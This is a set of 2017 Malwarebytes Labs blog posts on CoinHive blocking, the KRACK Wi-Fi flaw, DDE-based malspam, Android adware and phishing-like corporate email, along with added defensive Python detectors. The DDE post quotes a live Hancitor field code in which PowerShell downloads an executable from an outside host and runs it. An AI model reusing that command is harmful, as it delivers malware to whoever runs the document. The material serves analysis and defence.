Your final step is to actually navigate to the CoinHive website and make sure it’s not being blocked. If it is, go back in and check the settings to make sure you entered the URL and the IP address correctly. I tested this myself and it works. If you’ve done everything correctly, you should be able to navigate to the CoinHive website and also use the miners, even with full Malwarebytes protection enabled.

For more information about adding exclusions to your instance of Malwarebytes for Windows, please check out this Knowledge Base article we’ve written that guides you through every type of exclusion.

We hope some of you who are upset about our detection will understand why we decided to block this and similar websites after reading this article. We know there is a lot of controversy over not only this case, but mining technology in general, and moving forward we need to make sure we use it responsibly and securely. All new technologies have growing pains. The key is to make sure to learn lessons from the past, ensure that technology is secure and that the spirit of why it was created in the first place continues on in new evolutions.

We watched as the advertising industry evolved in such a way that made it easy for cybercriminals to use their platforms to attack users. We really don’t want to see miners go down the same path, and we hope it isn’t too late already.

Thanks for reading, safe surfing, and catch you next time!

The post Why is Malwarebytes blocking CoinHive? appeared first on Malwarebytes Labs.


Exhibition: it-sa Nuremberg

Malwarebytes - Wed, 10/18/2017 - 09:00

Scroll down for the German version of this post.

Since 2009, security professionals, developers, and product providers have shared their ideas and platforms at it-sa, a security exhibition in the Exhibition Centre in Nuremberg, Germany. This year, it-sa featured 629 exhibitors (including Malwarebytes) and 320 presentations in several open forums. It-sa encompasses the entire spectrum of the latest IT security products from all over the world. The estimated number of visitors was at 12,780.

While at the conference, we met a lot of old friends and made some new ones. And we talked to satisfied customers about what we have been up to since last year, and explained what we could do for companies looking for a new solution against the latest security threats.

We heard some interesting talks covering many fields in the cybersecurity realm and witnessed some live hacking performances. Not to mention we had some great discussions about those latest threats and how we protect our customers against them. Our short presentation about Jaff ransomware got a lot of attention and triggered some interesting discussions.

Our stand during one of the presentations

With ransomware being the prevalent and most worrying cyberthreat in Germany, as well as in the rest of the world, our explanation of the chain of infection that Jaff uses and at what stages of this chain Malwarebytes will protect your system was a popular topic.

German version (translated)

Since 2009, it-sa has been held as an independent trade fair at the Nuremberg Exhibition Centre. This year, 629 exhibitors (including Malwarebytes) were represented and there were 320 presentations in the open forums. The range of offerings at it-sa guides visitors through every topic related to IT security. The estimated number of visitors is 12,780.

We met many old and new friends. We talked with satisfied customers and discussed everything we have achieved over the past year. Among other things, we explained to potential new customers what we can do for them.

Fortunately, we also had time to listen to a few interesting talks in the security field and to follow a few live-hacking sessions.

Our it-sa team

Not to forget that we had some excellent discussions about the latest threats and how Malwarebytes protects against them.

Since ransomware is the most common and most feared cyberthreat in Germany, as in the rest of the world, our explanation of how a Jaff infection proceeds and how Malwarebytes protects against it was a popular topic as well as a good starting point for further discussions.

Many thanks to the city of Nuremberg for its hospitality.

The post Exhibition: it-sa Nuremberg appeared first on Malwarebytes Labs.


Release the KRACKen: flaw in Wi-Fi security leaves users vulnerable

Malwarebytes - Tue, 10/17/2017 - 16:44

A serious flaw in the wireless protocol that secures all modern protected Wi-Fi networks has been discovered.

How serious? If your device supports Wi-Fi, it is most likely affected. This practical attack, dubbed KRACK, abuses design or implementation flaws in the Wi-Fi standard itself, not in some specific hardware. The KRACK attack, short for Key Reinstallation Attack, would allow a malicious actor within Wi-Fi range to insert himself into the network and intercept traffic between the device and the router.

This means everyone using WPA2 (the protocol known as Wi-Fi Protected Access 2) could be impacted to some degree.

How impacted depends on multiple factors, but it ranges from traffic interception and decryption of encrypted data to injection of malicious traffic.

Android and Linux are especially vulnerable to this attack, as they can be tricked into re-installing an all-zero encryption key allowing full visibility into the traffic.

The good
  • Attacks can be somewhat mitigated if the traffic is HTTPS.
  • Apple has already patched iOS, macOS, tvOS, and watchOS. Great if your device is current; not so great if it isn’t.
  • Maybe this will finally get outdated routers retired and current ones patched?
  • Attacks are stymied by VPN usage.
  • If you have automatic updates on Windows, a patch has already been pushed, with a caveat. Microsoft still recommends contacting your hardware vendor to see if updated drivers for your wireless adapter are available.
  • Mathy Vanhoef did responsible disclosure and withheld public disclosure until major players could create patches.
The bad
  • Android users, with their fractured landscape and poor patching availability, are at risk, some with no possible solution.
  • Some routers will never receive updated firmware, making them vulnerable forever. Updating the firmware on a router is beyond what the average user feels comfortable doing.
  • While HTTPS can mitigate some attacks, improper implementations on websites are common, and once your traffic is routing through a maliciously controlled “man-in-the-middle” router, you’re vulnerable to other traffic manipulation.
  • Expect KRACK to go from POC to practical deployment at the coffee shop very quickly. Remember Firesheep? WEP wardriving? Someone is bound to make an app that will dramatically lower the difficulty to exploit this.
  • This won’t be fixed fully until the Wi-Fi standard is changed.
What to do about it
  • Run updates on all your devices, systems, and software. If you don’t have automatic updates on your Windows machine, look out for the Microsoft patch, which they issued on October 10.
  • Android users: Keep your eyes peeled for updates from Google, which they said would be available in the coming weeks.
  • If you’ve got Apple products, update them to the latest versions, which will protect against a KRACK attack. Older versions will be vulnerable.
  • See if your router manufacturers have issued updated firmware that addresses this vulnerability and update as soon as possible. If not, you might consider replacing the router.
  • It is important to keep in mind that it’s not only individuals who are impacted by this vulnerability, but also businesses. Any Wi-Fi deployment that uses WPA2 can be exploited. This means organizations should also push updates and be sure remote workers are securing their devices and systems as well.

The post Release the KRACKen: flaw in Wi-Fi security leaves users vulnerable appeared first on Malwarebytes Labs.


Old MS Office feature weaponized in malspam attacks

Malwarebytes - Tue, 10/17/2017 - 15:00

There has been a lot of talk recently following a write-up and proof of concept about a Microsoft Office feature that can be misused and weaponized by malicious actors. The protocol, known as Dynamic Data Exchange (DDE), has actually been around for a long time, and allows applications to exchange data and send updates to each other. This feature can be used, for example, to refresh a cell in Excel with data coming from another program.

Now threat actors are using this feature to distribute malware without relying on macros or exploits.

Perhaps what makes this technique most interesting is the fact that malicious actors can craft booby-trapped documents void of any macro and still achieve code execution. Macros have been a favourite among spammers, but they are highly suspicious, and many system administrators have set up group policies to disable them completely. This is why cybercriminals seek out any other way to deliver malware via Office files.

In the case of the DDE method, no exploits are used. Instead, a social engineering technique is employed to entice users into clicking a prompt.

DDE was first used in some targeted attacks. Now, however, it has become mainstream with the group behind Hancitor (spotted by @James_inthe_box, with the DDE usage identified by @mesa_matt), who leveraged it in their latest spam campaign.

We can find where the malicious code is inserted by checking for any reference to DDE within the document’s code. Didier Stevens published a Yara rule for this very purpose, but it seems the miscreants evaded detection by splitting the string of interest:

The final code put together looks like this:

"DdE" c:\\Windows\\System32\\cmd.exe " /k powershell.exe (New-Object System.Net. WebClient).DownloadFile('http://frontiertherapycenter[.]com/16.exe', '%TEMP%\\tvs.exe');Start-Process '%TEMP%\\tvs.exe'"</w:instrText>

The rest of the attack is straightforward, with PowerShell downloading and running the malicious binary (Hancitor) from the %temp% folder.
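The split-string evasion described above defeats any check that looks for a contiguous "DDE" in the raw XML. As an added example (not the post's own code, nor Didier Stevens's rule), the script below rejoins the instrText runs of each Word field before matching, so "Dd" + "E" is still caught; the sample document.xml is constructed and the command inside it is a harmless placeholder.

```python
# Added example, not from the original post: rejoin split <w:instrText>
# runs before looking for DDE field codes.  SAMPLE_DOCUMENT_XML below is
# constructed; its command is a harmless echo placeholder.
import re
import zipfile
import xml.etree.ElementTree as ET

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
W = "{%s}" % W_NS

# DDE or DDEAUTO as a whole word.  Word treats field names
# case-insensitively, which is why "DdE" in the campaign above still runs.
DDE_RE = re.compile(r"\bdde(?:auto)?\b", re.IGNORECASE)


def field_codes(document_xml):
    """Return the complete instruction text of every field in document.xml.

    Word stores a field as fldChar(begin) ... instrText runs ... fldChar(end),
    and the instruction may be spread over any number of instrText runs.
    Joining all runs between begin and end defeats simple string splitting.
    """
    root = ET.fromstring(document_xml)
    fields, current, depth = [], [], 0
    for elem in root.iter():
        if elem.tag == W + "fldChar":
            kind = elem.get(W + "fldCharType")
            if kind == "begin":
                depth += 1
                if depth == 1:
                    current = []
            elif kind == "end" and depth > 0:
                depth -= 1
                if depth == 0:
                    fields.append("".join(current))
        elif elem.tag == W + "instrText" and depth > 0:
            current.append(elem.text or "")
    return fields


def dde_fields(document_xml):
    """Fields whose rejoined instruction invokes DDE or DDEAUTO."""
    return [f.strip() for f in field_codes(document_xml) if DDE_RE.search(f)]


def raw_match(document_xml):
    """Naive check on the raw XML, for comparison: misses a split field name."""
    return DDE_RE.search(document_xml) is not None


def scan_docx(path):
    """Open a .docx (a zip archive) and report DDE fields in its main part."""
    with zipfile.ZipFile(path) as archive:
        xml_text = archive.read("word/document.xml").decode("utf-8")
    return dde_fields(xml_text)


# Constructed sample: the field name is split across two runs, as in the
# campaign above; a second, benign DATE field shows that normal fields pass.
SAMPLE_DOCUMENT_XML = """<w:document xmlns:w="%s"><w:body>
<w:p>
  <w:r><w:fldChar w:fldCharType="begin"/></w:r>
  <w:r><w:instrText xml:space="preserve"> Dd</w:instrText></w:r>
  <w:r><w:instrText xml:space="preserve">E c:\\\\Windows\\\\System32\\\\cmd.exe "/k echo placeholder" </w:instrText></w:r>
  <w:r><w:fldChar w:fldCharType="separate"/></w:r>
  <w:r><w:t>Loading...</w:t></w:r>
  <w:r><w:fldChar w:fldCharType="end"/></w:r>
</w:p>
<w:p>
  <w:r><w:fldChar w:fldCharType="begin"/></w:r>
  <w:r><w:instrText xml:space="preserve"> DATE \\@ "d MMMM yyyy" </w:instrText></w:r>
  <w:r><w:fldChar w:fldCharType="end"/></w:r>
</w:p>
</w:body></w:document>""" % W_NS

if __name__ == "__main__":
    print("raw XML contains DDE:", raw_match(SAMPLE_DOCUMENT_XML))
    for code in dde_fields(SAMPLE_DOCUMENT_XML):
        print("DDE field:", code)
```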

Office and malspam

Microsoft Office is being abused in both targeted and large-scale campaigns by malware authors who use a wide variety of techniques to execute malicious code. The DDE method is not new at all, but it is an example of how forgotten features can come back to haunt us.

Microsoft did not deem this a vulnerability, and so far has not decided to release a patch to render it harmless. One has to wonder how many people are still using DDE for legitimate purposes and consider the validity of retaining it.

Malwarebytes users are already protected against this latest campaign and similar ones.

Indicators of compromise

Word document




The post Old MS Office feature weaponized in malspam attacks appeared first on Malwarebytes Labs.


Yet more mobile adware found in Google Play

Malwarebytes - Tue, 10/17/2017 - 07:25

Finding an adware variant that made its way past the Google Play store is out of the ordinary. So when two adware variants slip by in one week, we take notice. Last week, we added two new Ad SDKs to our growing list of adware detections—Adware.Solid and Adware.Cootek. Both Ad SDKs were found in an abundance of apps in Google Play. Adware.Cootek infects over 2,000 Play store apps alone, according to our Mobile Intelligence System.

Behaving badly

Both pieces of adware have remarkably similar traits, displaying full screen ads inside and outside of the infected running app. In addition, they both show ads during screen lock and immediately after unlocking the screen. For your viewing pleasure, below you can find an array of offending ads with captions detailing the inappropriate timing:

We’re listening

Ads displayed inside a free app? Fair game. Ads displayed outside the app, especially during and immediately after screen lock? That, my dear readers, is where we draw the line. Many of these apps contain reviews on Google Play addressing the aggressive nature of the ads contained. Unfortunately, these reviews fall on the deaf ears of the app developers. But fear not my friends, for we are listening. Whether it’s in Google Play or not, we take a hard stance on aggressive adware. Cue shameless (yet helpful) plug: Malwarebytes for Android warns you when Ads are crossing the line.

Use common sense

A note to app developers. We get that you need to make some revenue from your hard work, and selecting an appropriate Ad SDK to tack onto your apps is tough business. Perhaps it’s unfair to take the blame when, at the time the Ad SDK was selected, it wasn’t considered adware. However, I ask this question: How many bad reviews does it take before you repackage with another, less offensive, Ad SDK? One app we found, which will remain nameless, had around 400 one-star reviews, and I’m willing to bet most were addressing the aggressive ads. Think about how you’d like to interact with an app: would all of those aggressive ads make you enjoy the app even more, or would they frustrate you? Use common sense when selecting an Ad SDK.

It’s up to the user

As already addressed in our Mobile Menace Monday post, we know that mobile adware is not dangerous malware—more like an inconvenience. In some cases, it goes beyond annoyance when it collects too much personal information. This can include GPS location, phone number, IMEI, and IMSI. Still, this isn’t a blatant act of maliciousness as seen from far more threatening pieces of malware.

It’s fully up to you, the user, whether to delete the offending app or ignore our warnings. If you choose to ignore and accept the presence of these annoying ads and/or the potential to collect personal information, no further harm should come your way. Admittedly, we can’t fully guarantee this claim—thus, I leave you with this: Ignore at your own risk.

Unfortunately, we called it

When Google Play Protect was released, I conveyed my concern for adware along with other Potentially Unwanted Programs (PUPs) still making their way into the Play market. Unsurprisingly, here we are with two new pieces of adware found in one week. My prediction is that this is only the beginning. Stay safe out there!

The post Yet more mobile adware found in Google Play appeared first on Malwarebytes Labs.


A week in security (October 9 – October 15)

Malwarebytes - Mon, 10/16/2017 - 19:00

Last week on the Labs blog, we talked about GDPR as part of our series in the National Cyber Security Awareness Month (NCSAM). We also discussed a new method for phishing Apple ID passwords and the possible ramifications. We analyzed the malvertising chain due to a script that was found on popular websites like those of Equifax (!) and TransUnion. And we explained how decoy Word documents are used to deliver malware using the hyperlink feature in the OpenXML format.

Malwarebytes news

It was a great week for Malwarebytes since we won three awards at the 2017 Computing Security Awards: Security Company of the Year, Editors’ Choice, and Malware Solution of the Year. And we were chosen as the winner in the “Rising Star: Cybersecurity Solution” category of the NetworkWorld Asia 2017 Readers’ Choice Awards.

Our CEO, Marcin Kleczynski, was interviewed by the Huffington Post on the subject 5 things I wish someone told me before I became CEO. And the Malwarebytes Labs team presented you with the quarterly Cybercrime Tactics and Techniques looking back at an unprecedented season of breaches.

Other security news

Business

Akamai presented their findings on a large-scale Fast Flux botnet at their annual customer conference. The botnet using Fast Flux techniques has over 14,000 IP addresses associated with it. Some of the associated IP addresses are in address spaces that are assigned to Fortune 100 companies. These addresses are most likely used by the Fast Flux network owner as spoofed entities and are not genuine members of the network. This allows the botnet to inherit the reputation of the Fortune 100 companies.

Pen Test Partners, a UK cybersecurity company, found appalling security lapses while investigating naval ships that had equipment exposed online. Ships nowadays are complex industrial machines: traditionally isolated, now always-on, connected through VSAT, GSM/LTE, and even Wi-Fi. Crew Internet access, mashed up with electronic navigation systems, ECDIS, propulsion, load management, and numerous other complex, custom systems is a recipe for disaster if not properly secured.

The Register discussed whether the law that would allow hacking victims to seek revenge and hack the hackers who hacked them is a good idea or not. The Active Cyber Defense Certainty Act amends the Computer Fraud and Abuse Act to make limited retaliatory strikes against cyber miscreants legal in America for the first time. The bill would allow hacked organizations to venture outside their networks to identify an intruder and infiltrate their systems, destroy any data that had been stolen, and deploy “beaconing technology” to trace the physical location of the attacker.

A series of distributed denial of service (DDoS) attacks aimed at Sweden’s transportation services caused train delays and disrupted other travel services. The DDoS bombardment reportedly crashed the IT system that monitors trains’ locations and tells operators when to go or stop. It also took down the federal agency’s email system, website, and road traffic maps.


Politifact was named as yet another site using cryptominers to have visitors pay for their visit to the site. We described the growing number of sites using drive-by mining some time ago.

Android users downloading a fake Adobe Flash Player from a malicious website may find themselves victimized by a unique strain of Android ransomware called DoubleLocker. “The most interesting thing here is that it uses a dangerous combination of three aspects we have not seen before: accessibility services, which perform a click on the user’s behalf; it encrypts data; and it can reset a PIN for a user’s device.”

Stay safe everyone!

The post A week in security (October 9 – October 15) appeared first on Malwarebytes Labs.


Phishes, pseudophishes, and bad email

Malwarebytes - Mon, 10/16/2017 - 18:00

Everyone knows about phishing. We’ve all heard that the solution to phishing is to educate the user as, after all, it must be the user’s fault for stupidly clicking on the thing. But what about when perverse incentives make clicking the phish seem logical? What about the enterprise pseudophish—when design-by-committee language, lack of attribution, and overbroad requests for personal information make something look like a phish?

Users will frequently be inundated with corporate requests for information; requests they are often required to comply with. When companies that don’t think these things through end up with something that apes the style of a phish, they can be training their users to click on actual phishes that come their way. Let’s check out a recent example pertinent to the Anthem breach settlement a few months back.

This legitimate email relies fairly heavily on the style and tone favored by phishes for decades. First of all, the email includes a lengthy “Claim ID” string without explaining what that means to the user. Next is the all-caps appeal to authority of a “court-approved legal notice.” The sender then includes an urgent call to action bounded with a deadline to induce anxiety. Lastly, they provide links with no indication of content and no direct connection to Anthem that the user is expected to click on.

Stylistically, the whole thing is a mess of odd margins and shifting formatting for no particular reason. Most concerning is that nowhere in the email does it address who the sender is, how they got your email, or what their connection to Anthem is.

Are there other ways to verify the legitimacy of the email, like examining headers, running the URL provided in a test VM first, or searching on the provided number? Of course. But can we realistically expect the user to do that for every ill-thought-out communication?

User education

The presumption of many security professionals is that clicking a malicious link is a lapse in judgment or temporary insanity on the part of the user. But given the above legitimate message that the user is required to read and act upon, is it unreasonable that they would click on a Dridex malspam using the same pitch? Would we as network defenders be shocked to see a phish that looked like this? And finally, given the absurdly high volume of email most end users deal with in an office environment, aren’t we really educating them to go ahead and click?

Please don’t do this

How do you stop phishing your own users? Before you hit send, make sure of the following:

  • Use consistent text formatting, spacing, and justification.
  • Don’t use third-party assets unless you know the user can display them in the same way you can.
  • Identify yourself, and provide a backchannel to verify who you are outside of the email. Faceless entities engaged in unsolicited contact to spur the user with an urgent call to action is a textbook phishing pitch.
  • Provide the full URL to links you want clicked. One of the most basic tricks in a phish is to hide or obfuscate a URL to discourage vetting by the user.

Malspam mitigation comes with many technical fixes: disabling Office macros, blocking unnecessary outbound traffic on a given user group’s profile, or blocking local execution of scripts, to name a few. But if the ultimate fix for phishing and malspam is the user who simply deletes the offending message, a simpler (and cheaper) fix is to stop flooding them with pseudophishes. Some additional time and forethought on user experience can create incentives leading to better security outcomes for everyone. When we send a clear, consistent message on security, we all stay safer.
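As an added example (not from the original post), a pre-send lint that checks an outgoing HTML mail against the list above: consistent fonts, first-party assets, a verifiable sender contact, and links whose visible text is the full URL, plus the shouting, deadline and unexplained-ID traits the Anthem notice showed. Both sample messages are constructed, and example.com stands for the sending organisation.

```python
# Added example, not from the original post: lint internal mail for the
# phish-like traits listed above.  BAD_EMAIL and GOOD_EMAIL are constructed;
# example.com is assumed to be the sending organisation's domain.
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class _MailParser(HTMLParser):
    """Collect links (href + visible text), image sources, fonts and text."""

    def __init__(self):
        super().__init__()
        self.links, self.images, self.fonts, self.text = [], [], set(), []
        self._href, self._label = None, []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        font = re.search(r"font-family\s*:\s*([^;]+)", attrs.get("style") or "")
        if font:
            self.fonts.add(font.group(1).strip().lower())
        if tag == "a" and attrs.get("href"):
            self._href, self._label = attrs["href"], []
        elif tag == "img" and attrs.get("src"):
            self.images.append(attrs["src"])

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._label).strip()))
            self._href = None

    def handle_data(self, data):
        self.text.append(data)
        if self._href is not None:
            self._label.append(data)


URGENCY_RE = re.compile(
    r"\b(?:within \d+ (?:hours|days)|deadline|immediately|act now|must respond|"
    r"will be (?:suspended|terminated|forfeited))\b", re.IGNORECASE)
SHOUTING_RE = re.compile(r"\b(?:[A-Z][A-Z-]{3,}\s+){2,}[A-Z][A-Z-]{3,}\b")
OPAQUE_ID_RE = re.compile(r"\b[A-Z0-9]{16,}\b")
BACKCHANNEL_RE = re.compile(r"\b(?:ext\.?|extension|phone|call)\D{0,20}\d{3,}",
                            re.IGNORECASE)


def lint_email(html, sender_domain):
    """Return (check, detail) findings; an empty list means the mail passes."""
    p = _MailParser()
    p.feed(html)
    text = " ".join(" ".join(p.text).split())
    findings = []
    if len(p.fonts) > 1:                        # consistent formatting
        findings.append(("inconsistent_fonts", sorted(p.fonts)))
    for href, label in p.links:                 # full URL shown, on our domain
        if label != href:
            findings.append(("hidden_url", f"{label!r} -> {href}"))
        if not (urlparse(href).hostname or "").endswith(sender_domain):
            findings.append(("offsite_link", href))
    for src in p.images:                        # no third-party assets
        if not (urlparse(src).hostname or sender_domain).endswith(sender_domain):
            findings.append(("third_party_asset", src))
    for check, rx in (("urgency", URGENCY_RE), ("all_caps", SHOUTING_RE),
                      ("unexplained_id", OPAQUE_ID_RE)):
        findings.extend((check, m.group(0)) for m in rx.finditer(text))
    if not BACKCHANNEL_RE.search(text):         # identify yourself, give a backchannel
        findings.append(("no_backchannel", "no phone/extension to verify the sender"))
    return findings


# Constructed sample in the style described above: unexplained ID, shouting,
# a deadline, a hidden link, off-domain assets and no way to verify the sender.
BAD_EMAIL = """<html><body>
<p style="font-family:Arial">Claim ID: 4K7QX9M2P8L3R6N1</p>
<p style="font-family:Times New Roman">THIS IS A COURT-APPROVED LEGAL NOTICE.</p>
<p>You must respond within 14 days or your claim will be forfeited.</p>
<p><a href="http://claims-portal.example.net/start?c=4K7QX9M2P8L3R6N1">Click here</a> to begin.</p>
<img src="http://cdn.example.net/banner.png">
</body></html>"""

# Constructed sample that follows the checklist.
GOOD_EMAIL = """<html><body>
<p>Hello from the HR Benefits team (HR helpdesk, ext. 4410).</p>
<p>Please review your benefits selections at
<a href="https://benefits.example.com/review">https://benefits.example.com/review</a>.</p>
</body></html>"""

if __name__ == "__main__":
    for check, detail in lint_email(BAD_EMAIL, "example.com"):
        print(f"{check:20} {detail}")
    print("clean mail findings:", lint_email(GOOD_EMAIL, "example.com"))
```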

The post Phishes, pseudophishes, and bad email appeared first on Malwarebytes Labs.


Mobile Menace Monday: despicable adware

Malwarebytes - Mon, 10/16/2017 - 17:00

Are you wondering how that mysterious icon ended up on your Android phone’s start screen? Annoyed at the ads clogging your notification bar? You aren’t alone. Thousands of Android apps now include software that shoves marketing icons onto your phone’s start screen or pushes advertising into your notification bar. These apps give you no warning about the adware invasion.

Even though many of these ads come from different mobile marketing companies, all have the same goal—to make money. Working with app developers hungry for some way to make money themselves, these marketing companies will do anything to make a buck. So they’ll bundle popular apps with adware and bombard millions of users with advertising each week.

Introduction to adware

So what, exactly, does adware do? Adware such as Startapp is a subcategory of Potentially Unwanted Programs (PUPs), which are apps or other types of software that you likely didn’t want installed on your computer, either because they hid their true nature or because they came bundled with other wanted programs. So if you download a popular app that comes bundled with adware, you may be in for a less-than-pleasant experience.

Once adware hijacks your device, it might carry out all sorts of unwanted tasks. For example, it could display questionable advertising content as icons, notification messages in the device interface, or pop-up messages. It might also change your browser front page or default search engine. It doesn’t matter whether you are using Chrome, Firefox, or other browsers: It affects all of them.

Let’s take as an example an app called Qr Code And Barcode Reader, which was once available on the Google Play market, but has now been removed. Qr Code marketed itself as a simple barcode reader, but hiding in plain sight was adware.

As discussed in our blog Mobile Menace Monday: Implications of Google Play Protect, Google Play is not impenetrable. In fact, at the time of this writing, two new types of adware were found in Google Play: Adware.Solid and Adware.Cootek. This is probably why the Qr Code app was available on the market in the first place. So let’s pretend we found this app in Google Play and decided to install it.

First evidence

When you first install Qr Code, it will ask you for device admin permissions without any note of why it needs these rights. If you’re a discerning user, this first piece of evidence may lead you to certain conclusions about the legality of the application itself. However, most people would probably take a quick glance and hit “activate” in order to get the app they were looking for.

Once you select “activate,” you give the app full access to the phone. This is when the app launches its evil plan to load and show ads directly on the home screen. We can explicitly observe this from logcat, a tool used to view real-time system messages on an Android device.

Logcat evidence

09-03 07:55:29.961 589-701/system_process I/ActivityManager: START u0 {flg=0x14000000 cmp=com.studiobit.qr.code.and.reader.v2.v2/com.studiobit.qr.code.and.reader.v2.AdvertisementActivity} from uid 10064 on display 0
09-03 07:55:29.972 1445-1445/com.studiobit.qr.code.and.reader.v2.v2 W/GooglePlayServicesUtil: Google Play Store is missing.
09-03 07:55:29.973 1445-1445/com.studiobit.qr.code.and.reader.v2.v2 I/Ads: Starting ad request.
09-03 07:55:29.973 1445-1445/com.studiobit.qr.code.and.reader.v2.v2 I/Ads: Use AdRequest.Builder.addTestDevice("7C6CCED8FF697C98BEAA38D05BG347D4") to get test ads on this device.
09-03 07:55:30.500 589-610/system_process I/ActivityManager: Displayed com.studiobit.qr.code.and.reader.v2.v2/com.studiobit.qr.code.and.reader.v2.AdvertisementActivity: +532ms

Scalpel, clamp

The smoking gun is in the manifest. Its permissions, activities, services, and receivers include the components associated with Adware.Startapp, so there is no doubt that this Qr Code app has adware components inside.

Activity: android:name=""
Service: android:name=""
Receiver: android:name=""

Methodology

Now we know Qr Code is certainly delivering adware. But in which way? There are many methods of displaying ads, including banners, splash ads, and exit ads. Qr Code uses Interstitial Callback methods.

Interstitial ads are full-screen ads that cover the interface of their host app. They typically appear between natural transition points in the flow of an app, such as between activities or during the pause between levels in a game. When an app shows an interstitial ad, the user has the choice to either tap on the ad and continue to its destination or close it and return to the app.

  • Callback method when the interstitial ad is loaded:
startAppAds.loadAd(new AdEventListener() { ... });
  • Callback method when the interstitial ad is shown:
startAppAds.showAd(new AdDisplayListener() { ... });


This type of ad is disruptive, sometimes difficult to close, and often results in a frustrating user experience.
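Pulling the two pieces of evidence above together, here is an added example (not code from the original post or from Malwarebytes) of how an analyst can triage a decoded AndroidManifest.xml (for instance apktool output) instead of eyeballing it: it lists the declared permissions, flags activities, services and receivers whose class names belong to a known ad-SDK package, and flags any receiver that requests device-administrator rights. The StartApp package prefix and the component names in the constructed sample manifest are illustrative assumptions; the real app's component names were not preserved above.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
A = "{%s}" % ANDROID_NS  # ElementTree spells android:name as {ns}name

# Illustrative ad-SDK package prefixes (assumption: extend with what your own
# samples reveal; the component names of the real app were not preserved).
AD_SDK_PREFIXES = (
    "com.startapp.",   # StartApp, the SDK behind the Adware.Startapp detection
)

DEVICE_ADMIN_PERMISSION = "android.permission.BIND_DEVICE_ADMIN"
DEVICE_ADMIN_ACTION = "android.app.action.DEVICE_ADMIN_ENABLED"


def parse_manifest(xml_text):
    """Return the facts a triage wants from a decoded manifest: declared
    permissions, components belonging to a known ad SDK, and receivers
    that request device-administrator rights."""
    root = ET.fromstring(xml_text)
    findings = {"package": root.get("package"), "permissions": [],
                "ad_sdk_components": [], "device_admin_receivers": []}
    for perm in root.findall("uses-permission"):
        findings["permissions"].append(perm.get(A + "name"))
    app = root.find("application")
    if app is None:
        return findings
    for comp in app:
        if comp.tag not in ("activity", "service", "receiver", "provider"):
            continue
        name = comp.get(A + "name", "")
        if name.startswith(AD_SDK_PREFIXES):
            findings["ad_sdk_components"].append((comp.tag, name))
        # A device-admin receiver is protected by BIND_DEVICE_ADMIN and listens
        # for DEVICE_ADMIN_ENABLED. An active admin app cannot be uninstalled
        # until the user deactivates it, which is why adware asks for it first.
        if comp.tag == "receiver" and comp.get(A + "permission") == DEVICE_ADMIN_PERMISSION:
            actions = [act.get(A + "name") for act in comp.iter("action")]
            if DEVICE_ADMIN_ACTION in actions:
                findings["device_admin_receivers"].append(name)
    return findings


def verdict(findings):
    """Short list of flags: ad-SDK components present, device-admin requested."""
    flags = []
    if findings["ad_sdk_components"]:
        flags.append("ad-sdk-components")
    if findings["device_admin_receivers"]:
        flags.append("device-admin")
    return flags


# Constructed sample manifest; package and class names are made up for this example.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.qrreader">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
  <application android:label="QR Reader">
    <activity android:name="com.example.qrreader.MainActivity"/>
    <activity android:name="com.example.qrreader.AdvertisementActivity"/>
    <activity android:name="com.startapp.android.publish.adsCommon.activities.OverlayActivity"/>
    <service android:name="com.startapp.android.publish.common.metaData.PeriodicMetaDataService"/>
    <receiver android:name="com.startapp.android.publish.common.metaData.BootCompleteListener">
      <intent-filter><action android:name="android.intent.action.BOOT_COMPLETED"/></intent-filter>
    </receiver>
    <receiver android:name="com.example.qrreader.AdminReceiver"
              android:permission="android.permission.BIND_DEVICE_ADMIN">
      <meta-data android:name="android.app.device_admin" android:resource="@xml/device_admin"/>
      <intent-filter><action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/></intent-filter>
    </receiver>
  </application>
</manifest>"""

if __name__ == "__main__":
    found = parse_manifest(SAMPLE_MANIFEST)
    for tag, name in found["ad_sdk_components"]:
        print("ad SDK %-8s %s" % (tag, name))
    print("device admin receivers:", found["device_admin_receivers"])
    print("flags:", verdict(found))
```

Run against a manifest pulled from the APK with apktool, a hit on both flags is the combination described above: ad components hiding behind a device-admin request that makes the app awkward to remove.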

But what you need to keep in mind when faced with adware is that, despite being incredibly bothersome, it is generally not malicious. There is a significant difference between adware and dangerous malware such as Trojans or ransomware, so there is no need to panic: your device is not under imminent threat. The one practical wrinkle with this sample is the device administrator rights it asked for: an app that is an active administrator cannot be uninstalled until you deactivate it in the device administrators list under Settings, so do that first if you decide to remove it.

In fact, many mobile applications that are free of charge often include third-party advertising content. This is done as an alternative form of revenue for the software developers, as a result of not charging users for the application itself. Sometimes using these apps outweighs the inconvenience of having adverts displayed. It’s up to you to decide what you’ll put up with in exchange for keeping the application installed.

However, in our opinion, adware does more harm than good, and you shouldn’t have to put up with overbearing pop-ups in order to enjoy an app. (Malwarebytes for Android will detect adware and remove it if you choose.) So next time you download an app, take a hard look at what it includes. If adware is present, you might do better to choose another one!

The post Mobile Menace Monday: despicable adware appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Decoy Microsoft Word document delivers malware through a RAT

Malwarebytes - Fri, 10/13/2017 - 15:00

In this post, we take a look at a Microsoft Word document which is itself somewhat clean, but is used to launch a multi-stage attack that relies on the OpenXML format’s ability to reference an external target by URL. Opening the decoy makes Word load a second document, and that one contains the exploit.

Most malicious Microsoft Office documents involve either macros, embedded scripts, or exploits and are typically delivered via email. In this case, the unsuspecting user opening the decoy Word document will trigger an automatic (no click or interaction required) download of a malicious RTF file that deploys an exploit (CVE-2017-8759), which ends up distributing the final malware payload.

The payload, several steps removed from the decoy, is a commercial Remote Administration Tool that, in this case, is used for nefarious purposes. Victims will be none the wiser, as the infection process happens in the background while their Word document finally loads what looks like legitimate content.

While attackers could have sent the exploit-laced document first, that might have triggered detection and quarantine at the email gateway. Instead, the benign document acted as a kind of Trojan horse that made its way to the end user’s desktop, where it would finally show its real intent.

The diagram below summarizes the different steps that this attack takes, from the original document all the way to the malware payload.

Initial package

The initial document was reported by @xme on Twitter. A quick check using oletools indicates that the file has the OpenXML format and no macros.

FILE: Product Description.docx
Type: OpenXML
No VBA macros found.
